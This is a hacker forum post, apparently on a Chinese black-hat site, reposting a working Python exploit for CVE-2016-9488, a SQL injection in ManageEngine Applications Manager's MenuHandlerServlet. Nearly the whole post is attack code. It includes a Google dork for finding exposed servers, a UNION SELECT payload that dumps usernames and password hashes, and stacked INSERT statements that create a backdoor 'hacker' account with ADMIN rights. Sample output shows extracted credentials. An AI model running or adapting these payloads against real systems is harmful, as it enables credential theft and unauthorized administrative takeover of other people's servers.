跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
# Google Dork: intitle:"Applications Manager Login Screen"
# Date: 2020-07-23
# Exploit Author: aldorm
# Vendor Homepage: https://www.manageengine.com/
# Software Link:
# Version: 12 and 13 before Build 13200
# Tested on: Windows
# CVE : 2016-9488

#!/usr/bin/env python2

# App:          ManageEngine Applications Manager
# Versions:     12 and 13 before build 13200
# CVE:          CVE-2016-9488
# Vuln Type:    SQL Injection
# CVSSv3:       9.8
# 
# PoC Autor:    aldorm
# Release date: 23-07-2020

# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker
# [*] Extracting all users:
# 	 admin:21232f297a57a5a743894a0e4a801fc3
# 	 reportadmin:21232f297a57a5a743894a0e4a801fc3
# 	 systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3
# [*] Creating new user: 
# 	User: hacker 
#	Password: admin
# [*] Verifing created user...
# Success.


import sys 
import requests
import urllib3
import json


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target = 'localhost'

def get_userpassword():
    sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--'
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
    j = json.loads(r.text)
    return j

def create_user():
    sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    return 


def main ():
    if not len(sys.argv) > 2:
        print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0]
        print "e.g. %s manageengine 8443 " % sys.argv[0]
        sys.exit(1)

    global target
    global port
    target=sys.argv[1]
    port=sys.argv[2]

    print "[*] Extracting all users:"
    j = get_userpassword()
    for user in j["0"]:
        print "\t %s" % user[1]
    

    if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker':
        print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin"    
        create_user()
        print "[*] Verifing created user..."

        j = get_userpassword()
        for user in j["0"]:
            if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3":
                print "Success."
                return
        print "User not created."



if __name__ == '__main__':
    main()

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。